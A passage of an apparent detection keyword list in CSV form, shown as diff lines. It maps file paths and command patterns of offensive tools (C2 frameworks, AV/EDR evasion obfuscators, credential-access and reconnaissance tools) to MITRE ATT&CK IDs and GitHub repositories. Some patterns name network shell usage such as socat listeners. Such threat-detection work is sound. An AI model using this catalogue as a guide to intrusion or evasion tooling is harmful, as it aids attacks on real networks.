TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*/NtRights/*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/NtSetSystemInformation.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/Nuages_Cli*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*/nuagesAPI.js*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*/nxc --help*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc/parsers/ip.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc/parsers/nmap.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nxc-ubuntu-latest*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/nysm bash*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm -dr socat TCP4-LISTEN*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST 
Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm -r ssh *@*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm.bpf.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/nysm.git*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/o365recon*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*/oab-parse/mspack.*.dll*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 
- T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/obfs3/obfs3.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/obfuscated_scripts/*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/Obfuscator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/obfuscator/obfuscator.*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*/octopus.asm*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*/Octopus.git*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*/octopusx64.asm*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*/OffensiveCSharp.git*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/OffensiveCSharp/*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/OffensiveNotion.git","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*/OffensiveNotion/agent*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*/OffensiveNotion/osxcross/target/bin*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*/OffensiveNotion/utils*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking 
app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z"
+"*/OG-Sadpanda/*","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z"
+"*/Oh365UserFinder*","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. 
or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","468","84","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z"
+"*/OJ/gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z"
+"*/omg-payloads.git*","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*/omp2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/omp2-enum-targets.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/omron-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/On_Demand_C2/*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z"
+"*/onedrive_user_enum*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z"
+"*/oneliner.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of 
an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*/oneliner2.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*/onesixtyone/dict.txt*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z"
+"*/onex.git*","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/open_vas.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/openbullet.git*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z"
+"*/OpenBullet2.git*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z"
+"*/openflow-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/openlookup-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/openvas-otp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/openwebnet-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/opt/.exegol_aliases*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/opt/chimera*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z"
+"*/opt/cobaltstrike/logs*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*/opt/Covenant/Covenant/*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*/opt/gocrack/files/engine*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
+"*/opt/gocrack/files/task*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z"
+"*/opt/icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*/opt/implant/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z"
+"*/opt/lwp-scripts*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/opt/lwp-wordlists*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/opt/merlin/*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z"
+"*/opt/nessus/*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A"
+"*/opt/Ninja/*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*/opt/Password_Cracking/*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z"
+"*/opt/PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
